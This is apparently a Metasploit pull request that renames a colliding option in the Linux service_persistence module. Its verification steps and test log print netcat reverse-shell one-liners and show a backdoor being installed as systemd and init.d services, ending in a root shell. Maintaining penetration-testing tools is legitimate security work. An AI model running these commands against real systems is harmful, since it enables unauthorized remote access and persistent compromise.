
Fix option collision in service_persistence #18786

Merged: 1 commit, Feb 14, 2024

Conversation

@lihe07 (Contributor) commented Feb 4, 2024

The option SHELLPATH collides with cmd/unix/reverse_netcat, resulting in abnormal backdoors. This PR renames it to BACKDOOR_PATH.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/local/service_persistence
  • set payload cmd/unix/reverse_netcat
  • Start a handler and a meterpreter session
  • set verbose true
  • exploit SESSION=<x>
  • Before this fix, the generated payload will be like this:
    [+] mkfifo /tmp/mhbeaw; nc XXXX 4444 0</tmp/mhbeaw | /tmp >/tmp/mhbeaw 2>&1; rm /tmp/mhbeaw
    And after the fix:
    [+] mkfifo /tmp/mhbeaw; nc XXXX 4444 0</tmp/mhbeaw | /bin/sh >/tmp/mhbeaw 2>&1; rm /tmp/mhbeaw
  • Document written

The option `SHELLPATH` collides with `cmd/unix/reverse_netcat`,
resulting in abnormal backdoors. This commit renames it to BACKDOOR_PATH
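The failure mode above is a flat, shared datastore: the module and the payload both register an option called SHELLPATH, so whichever value lands last is what the payload uses as its shell. The following is an added example, not Metasploit code, that models that merge with a simplified option struct and shows the check a maintainer can run to catch such a collision before the rename is needed; the merge order (module defaults overwriting payload defaults) is an assumption chosen to match the output quoted in this PR.

```ruby
# Added example (not Metasploit code): models how a module and its payload
# share one flat datastore, so two components registering the same option
# name silently overwrite each other. Opt is a stand-in for OptString; the
# registrations below are constructed to mirror this PR's before/after state.

Opt = Struct.new(:name, :default, :desc)

PAYLOAD_OPTS = [Opt.new('SHELLPATH', '/bin/sh', 'Shell used by the payload')]

MODULE_OPTS_BEFORE = [Opt.new('SHELLPATH', '/tmp', 'Writable directory for the backdoor')]
MODULE_OPTS_AFTER  = [Opt.new('BACKDOOR_PATH', '/tmp', 'Writable directory for the backdoor')]

# Option names registered by both sides. This is the lint a reviewer would
# want: a non-empty result means the two components will clobber each other.
def option_collisions(module_opts, payload_opts)
  module_opts.map(&:name) & payload_opts.map(&:name)
end

# Build the merged datastore as a last-writer-wins hash: payload defaults,
# then module defaults (assumed order), then anything the operator typed.
def merged_datastore(module_opts, payload_opts, user = {})
  store = {}
  payload_opts.each { |o| store[o.name] = o.default }
  module_opts.each  { |o| store[o.name] = o.default }
  store.merge(user)
end

# The value the payload will actually use for its shell once merged.
def payload_shell(module_opts, payload_opts, user = {})
  merged_datastore(module_opts, payload_opts, user).fetch('SHELLPATH')
end

if $PROGRAM_NAME == __FILE__
  puts "collisions before: #{option_collisions(MODULE_OPTS_BEFORE, PAYLOAD_OPTS).inspect}"
  puts "shell before fix:  #{payload_shell(MODULE_OPTS_BEFORE, PAYLOAD_OPTS)}"   # /tmp
  puts "shell after fix:   #{payload_shell(MODULE_OPTS_AFTER, PAYLOAD_OPTS)}"    # /bin/sh
end
```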
@cdelafuente-r7 (Contributor)

Thanks for fixing this @lihe07! Everything looks good to me now. I tested against Ubuntu 20.04.4 and verified the correct path was set. I'll go ahead and land it.

Example output:
msf6 exploit(linux/local/service_persistence) > run verbose=true session=7 BACKDOOR_PATH=/tmp SHELLPATH=/bin/bash

[+] mkfifo /tmp/ymnda; nc 192.168.128.4 4444 0</tmp/ymnda | /bin/bash >/tmp/ymnda 2>&1; rm /tmp/ymnda
[*] Started reverse TCP handler on 192.168.128.4:4444
[!] SESSION may not be compatible with this module:
[!]  * incompatible session type: meterpreter
[*] Writing backdoor to /tmp/KovUb
[*] Utilizing systemd
[*] Writing service: /lib/systemd/system/wQrhwGY.service
[*] Enabling service
[*] Starting service
[*] Utilizing System_V
[*] Utilizing update-rc.d
[*] Writing service: /etc/init.d/tJbEXCq
[*] Enabling & starting our service
[*] Command shell session 8 opened (192.168.128.4:4444 -> 192.168.128.4:61858) at 2024-02-14 17:18:12 +0100

id
uid=0(root) gid=0(root) groups=0(root)

@cdelafuente-r7 cdelafuente-r7 merged commit 747d328 into rapid7:master Feb 14, 2024
37 checks passed
@cdelafuente-r7 (Contributor)

Release Notes

This fixes an option name collision in the exploit/linux/local/service_persistence module when the payload is set to cmd/unix/reverse_netcat. The option to set the writable path is now BACKDOOR_PATH.

@smcintyre-r7 smcintyre-r7 added the rn-fix release notes fix label Feb 16, 2024
Labels: bug, module, rn-fix (release notes fix)